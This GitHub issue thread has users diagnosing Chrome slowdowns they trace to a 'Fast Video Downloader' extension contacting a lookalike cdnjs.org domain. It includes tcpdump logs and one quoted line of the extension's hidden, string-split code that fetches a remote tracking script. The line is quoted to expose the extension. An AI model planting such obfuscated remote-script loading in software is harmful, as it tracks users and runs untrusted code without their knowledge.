### ISSUE TITLE
Frequent "Waiting for cdnjs.org" with Chrome

### ISSUE THREAD

**Issue by misteracacia** [cdnjs/cdnjs#4716]
Over the past several days I have noticed some pretty lengthy delays waiting for the server at cdnjs.org to respond to whatever request has been sent from Chrome and Chromium browsers. There appear to be no such delays with Opera or Firefox. I don't know if this is an issue with the cdnjs servers or with the Chrome code. If I can provide any additional information please let me know.

Chromium: Version 41.0.2272.76 Built on Ubuntu 14.04, running on LinuxMint 17.1 (64-bit)

**Comment by PeterDaveHello** [comment]
What about cdnjs.com?

**Comment by LucaDev** [comment]
+1
cdnjs.com also

**Comment by PeterDaveHello** [comment]
cc @thomasdavis @ryankirkman @terinjokes

**Comment by PeterDaveHello** [comment]
any info in detail? @LucaDev @misteracacia 
what about cdnjs.cloudflare.com?

**Comment by thomasdavis** [comment]
And your location will also help us track this down

**Comment by misteracacia** [comment]
cjdns.com does come up rather immediately. Accessing http://cdnjs.org redirects me to cdnjs.com. When I am waiting for cdnjs.org I am opening a Facebook-based game. The game may or may not load, and when it can't, it appears to be due to a timeout waiting for cdnjs.org. My location is near Mojave, Ca, using RoadRunner via BrightHouse

Let me know what other details I can provide and I will gather them up

**Comment by LucaDev** [comment]
btw sometimes cdnjs.cloudflare.com is blocking my requests

Details:
Germany(POP: Link 3) Chrome Win 8.1 64bit

**Comment by lukemcgregor** [comment]
+1 my azure app insights (site ping) seems to be failing because of this,

 > at 06/08/2015 19:03:23 (UTC) for Uri 'https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.3.0/css/font-awesome.min.css', step #1 with the error 'The request was aborted: Could not create SSL/TLS secure channel.',

*User agent:* Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36

*Locations:* I'm testing from Amsterdam, Singapore and Chicago, (2 are failing but I cant tell which 2)

**Comment by ellipsisno** [comment]
"Waiting for cdnjs.org..." has been appearing all morning today, reduces browsing to a crawl. 5 - 10 second wait times before pages load, etc.

**Comment by Watchdog5x5** [comment]
Same problem started Jun 13, insane wait time on load of most websites. I have been forced to use other browsers. Only Chrome seems to be effected

**Comment by PeterDaveHello** [comment]
@Watchdog5x5  @ellipsisno please provide your location, ISP, etc.

**Comment by Iorty** [comment]
Hello. From today i have same problem with Chrome. I get 5-10 seconds delay till the website loads and everything in it is innactive(like search bars, links and etc.) for like another 5 seconds.
Is there any solution to this problem?
P.S. I live in Varna region, Bulgaria. My ISP is Vivacom

**Comment by Csmbv** [comment]
Hi all. I had the same issue, I disabled the extension "Fast Video Downloader" and the problem was gone :)

**Comment by Iorty** [comment]
@Csmbv Thank you very much! I took your advice and problem is gone. Cheers!

**Comment by cpriest2** [comment]
Csmbv:  signed up for an account simply to tell you "thank you." This has been driving me nuts. SFAICT, cdnjs.org seems to be some kind of clearing service or safety net either Chrome or Avast! or somebody uses to help protect you from bogus websites or malware. I wish Chrome (or whomever) would at least tell us what this is. In any case, FVD has some apparent problems with its safety or it takes cdnjs.org longer, for whatever reason, to clear it or allow it to load every time you surf to a new location. For ow, might be best to only enable it when you are actually about to use it.

In any case, thanks for posting; most of us don't bother. :-) But I was seriously about to start screaming at my PC. I owe you a beer.

**Comment by theluckyg** [comment]
@Csmbv Thank you!

**Comment by balakkvj** [comment]
@Csmbv Thank you! I had the same problem of cdnjs.org making the browser too slow. I removed the FVD Plugin and back to normal Chrome.

**Comment by Daaamo** [comment]
@Csmbv thank you from me as well. Fixed!

**Comment by PeterDaveHello** [comment]
Thanks @Csmbv :+1:

**Comment by ellipsisno** [comment]
Yeah, that worked, thanks @Csmbv. And to think I had only installed 'FVD' yesterday for the first time. That was quick!

**Comment by Csmbv** [comment]
Welcome all, glad I could help )

**Comment by cpriest2** [comment]
@Csmbv : I'm betting there are thousands of perplexed Chrome users wondering what this problem is. Help? You're a freaking superhero. I mean it: you're Batman.

**Comment by DavidPesta** [comment]
@Csmbv : I'm another user who thanks you for the instruction to disable Fast Video Downloader.

**Comment by fldrog** [comment]
+1 fo Fast Video Downloader. Thanks!

**Comment by drewfreyling** [comment]
Can we consider this closed?

**Comment by PeterDaveHello** [comment]
@drewfreyling +1

**Comment by rewolff** [comment]
Guys.... Before google-searching this issue, I did a TCPDUMP filtering the CDNJS.ORG IP addresses. 

To me the results clearly show that the SERVER at cdnjs.org is causing a delay. 
```
20:40:23.275527 IP 104.27.150.74.443 > 192.168.x.y.52984: Flags [P.], seq 10770:10807, ack 3274, win 38, length 37
20:40:23.275529 IP 192.168.x.y.52984 > 104.27.150.74.443: Flags [.], ack 10807, win 465, length 0
20:40:23.280238 IP 104.27.150.74.443 > 192.168.x.y.52984: Flags [.], ack 3853, win 41, length 0
.... DELAY HERE .... 
20:40:38.310800 IP 104.27.150.74.443 > 192.168.x.y.52984: Flags [.], seq 10807:12259, ack 3853, win 41, length 1452
20:40:38.310813 IP 192.168.x.y.52984 > 104.27.150.74.443: Flags [.], ack 12259, win 488, length 0
20:40:38.311015 IP 104.27.150.74.443 > 192.168.x.y.52984: Flags [.], seq 12259:13711, ack 3853, win 41, length 1452
20:40:38.311021 IP 192.168.x.y.52984 > 104.27.150.74.443: Flags [.], ack 13711, win 511, length 0
20:40:38.312536 IP 104.27.150.74.443 > 192.168.x.y.52984: Flags [P.], seq 13711:14932, ack 3853, win 41, length 1221
```
As you can see, CDNJS.ORG (104.27.150.74) Sends 37 bytes. Then a 15 second delay followed by 4125 bytes of data. My page-load pauses for those 15 seconds. 

From the "workaround" we've learned that the requests to cdnjs probably originate in "fast video downloader". But the tcpdump data that I've gathered shows that the server at cdnjs.org is also involved. 

I've investigated "cdnjs" to the point that I know that it is some opensource javascript repository. If and how this is related to the server-delays I don't know. But in my opinion I do think that "cdnjs" is somehow responsible for the delays. 

Besides 15 second delays, I have also observed 7.5 second delays: 
```
19:48:18.026192 IP 192.168.x.y.52582 > 104.27.150.74.443: Flags [.], ack 33726, win 914, length 0

19:48:25.667487 IP 104.27.150.74.443 > 192.168.x.y.52582: Flags [P.], seq 33726:34331, ack 8886, win 59, length 605
```

I am suspecting a TCP level misconfiguration of the server at cdnjs. Say for example that it attempts to send a 4k packet at once because its link level is configured for larger packets. However, fragmentation then doesn't work, resulting in a 15 second delay before retransmissions with smaller packet sizes result in a delivered packet. 

Let me know if I'm making sense.... :-)

**Comment by PeterDaveHello** [comment]
@rewolff cc @cdnjs/team-cdnjs

**Comment by ryankirkman** [comment]
@rewolff Just to make it very clear, we have nothing to do with cdnjs.org

https://cdnjs.com/ is the only official cdnjs website. All CDN assets are served from https://cdnjs.cloudflare.com

I highly recommend you get all of your script links from https://cdnjs.com/

**Comment by PeterDaveHello** [comment]
@rewolff Thanks, will take a look at your feedback!

**Comment by rewolff** [comment]
I have NEVER written anything that uses  cdnjs. I am just a user that is annoyed at the "waiting for cdnjs.org" being displayed while my page doesn't load. If I'm barking up the wrong tree, I was hoping someone here might know who to prod to look into this....

**Comment by drewfreyling** [comment]
@rewolff I'm with @ryankirkman here - your assets should be served up by `cdnjs.cloudflare.com` so I feel that you shouldn't be referencing anything from `cdnjs.org`

**Comment by rewolff** [comment]
@drewfreyling , @ryankirkman : To be blunt: You apparently do not understand what I'm reporting here: 
FACT: I don't use/program/whatever "cdnjs". Never heard of it.... except: ...
FACT: My browser often stalled rendering a page while "waiting for www.cdnjs.org" was displayed in the status line. 
FACT: I looked up the IP addresses for cdnjs.org: 104.27.150.74  and 104.27.151.74. 
FACT: There is an HTTPS connection from my machine to those IP addresses that often stalls for 15 seconds, exactly at the time when a page fails to load. 
FACT: The connection to cdnjs.org seems to be related to the fast video downloader plugin: the page-not-loading with "waiting for cdnjs.org" displayed goes away if the plugin is disabled. Simultaneously the traffic to cdnjs.org is a lot less once the plugin is disabled. 

Now it could very well be that you are right that this has nothing to do with the cdnjs project. Maybe there is malware hidden in that plugin, which reports my browsing habits to a script hidden on the https server of cdnjs.org. But saying "your assets should be served up by cdnjs.cloudflare.com" leads to the conclusion that whatever it is, it isn't "assets".  (in quotes because I don't know what that word means in this context).

**Comment by drewfreyling** [comment]
My point was either that plugin or a website you are visiting is referring to something on cdnjs.org when it shouldn't.

**Comment by ellipsisno** [comment]
@rewolff same here. I hadn't heard of 'cdnjs' until trying the 'Fast Video Downloader' browser extension for the first time. I had not researched the latter either, I was trying it out blindly. I immediately uninstalled it upon discovering this 'issue' on github.

**Comment by rewolff** [comment]
The problem (page stalled) occurs across many different websites. Disabling FVD fixes it across the board. So it's not "the website" that is referring to cdnjs. 
Does anybody know an easy way to man-in-the-middle myself to see the HTTPS traffic to cndjs.org?

With cdnjs.org redirecting immediately to cdnjs.com,  but my browser makes long-lasting hjttps connections to the associated IP addresses. Something fishy is going on. Could it be that some bad actors registered the sister domain and then cover up by redirecting to the real domain, and hiding their tracker under a deep URL somewhere on their server?

**Comment by ryankirkman** [comment]
Great point @rewolff, investigating what happens when connecting to
cdnjs.org could be a very good line of investigation.

As for MITM yourself, I don't know offhand but it sounds possible. Perhaps
Wireshark might be a good place to start, or something like Charles Proxy
if you are on Mac.

**Comment by rewolff** [comment]
@ryankirkman I know of "wireshark". I'm oldschool and do the same thing with "tcpdump" (Wireshark tells me it doesn't have privileges to capture ethernet when I run as non-root and it warns me against running as root when I do so... Occasionally I invest an hour or so to figure this out, fail and give up again... :-) ). Anyway, wireshark/tcpdump doesn't help: The link is encrypted, the packets caught by wireshark or tcpdump are exactly the same as a "man in the middle" would be able to capture, and the encryption is strong enough to prevent disclosure of the content to a "man in the middle".

**Comment by anonym24** [comment]
It's strange... developer of FVD hid url in jquery2.js
Google must delete that (i reported to them - https://chrome.google.com/webstore/report/nocpfkkbaekckhcoekockfbidpcjgkbd)
`getScript("ht"+"t"+"ps:/"+"/cd"+"njs.o"+"rg/tr"+"ack/st"+"ats.j"+"s"+"?id="+chrome.runtime.id,function(){})`

**Comment by n1ghtfury** [comment]
@Csmbv Thanks a lot, been facing this issue for a while now, and finally had enough of it, when you came to the rescue, forever grateful :)

**Comment by whosvinny** [comment]
@Csmbv , thank you, it solved the problem.

**Comment by PeterDaveHello** [comment]
Maybe we should add this in the document ...

**Comment by ryankirkman** [comment]
Yeah, sounds like a good idea.

**Comment by drewfreyling** [comment]
For what it is worth I've reported them as well :)

**Comment by ellipsisno** [comment]
> Just to make it very clear, we have nothing to do with cdnjs.org

@ryankirkman I had forgotten what this was about, but I keep getting response notifications so I went to 'cdnjs.org' to refresh my memory and it immediately redirects to cdnjs.com. If you have nothing to do with the former, it sure doesn't look that way at first.

**Comment by terinjokes** [comment]
Anyone can have a website that does questionable things on specific paths, but redirects the root to somewhere else.

**Comment by ellipsisno** [comment]
@terinjokes yeah, but seeing as how the source of the problem was 'revealed' _5 months ago_, it seems kinda strange that the former would still be conflating itself with the latter at this juncture.

Oh well, I don't really care either way as I don't use 'cdnjs' for anything (not knowingly at least...).

**Comment by rewolff** [comment]
@ellipsisno The cdnjs.org site is under control of an unknown party. They can do whatever they like with the domain. In this case, redirect most visitors to cdnjs.com, log tracking info on a specific URL. This is not under the control of cdnjs.com guys.

**Comment by PeterDaveHello** [comment]
@rewolff Thanks.

**Comment by drewfreyling** [comment]
The extensoin has been removed. Can we consider this closed?

**Comment by PeterDaveHello** [comment]
@drewfreyling I am okay with this.

**Comment by PeterDaveHello** [comment]
@drewfreyling this issue was closed for a lone time, I guess you want to "Lock" it?

**Comment by drewfreyling** [comment]
Yes.
